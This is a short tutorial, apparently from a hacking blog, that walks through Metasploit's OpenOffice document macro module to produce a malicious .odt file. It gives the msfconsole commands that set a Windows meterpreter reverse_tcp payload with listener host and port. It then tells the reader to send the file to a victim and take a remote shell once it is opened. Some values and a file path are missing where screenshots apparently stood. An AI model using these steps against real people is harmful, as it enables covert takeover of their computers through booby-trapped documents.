Exploit Remote PC with Apache OpenOffice Text Document Malicious Macro Execution

This module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning. The module also works against LibreOffice.

Exploit Targets

Apach Open Office on Windows


Attacker: kali Linux

Victim PC: Windows 10

Open the terminal in kali Linux and type msfconsole to load metasploit framework.

Now type use exploit/multi/misc/openoffice_document_macro

msf exploit (openoffice_document_macro)>set payload windows/meterpreter/reverse_tcp

msf exploit (openoffice_document_macro)>set lhost (IP of Local Host)

msf exploit (openoffice_document_macro)>set srvhost

msf exploit (openoffice_document_macro)>set lport 4444

msf exploit (openoffice_document_macro)>exploit

 From the screenshot you can see the highlighted text is showing the path of malicious odt file.

The malicious odt File had been generated successfully which is stored on your local computer inside following path:


Now send your msf.odt files to victim, as soon as he download and open it, you can access meterpreter shell on victim computer.

Leave a Reply

Your email address will not be published. Required fields are marked *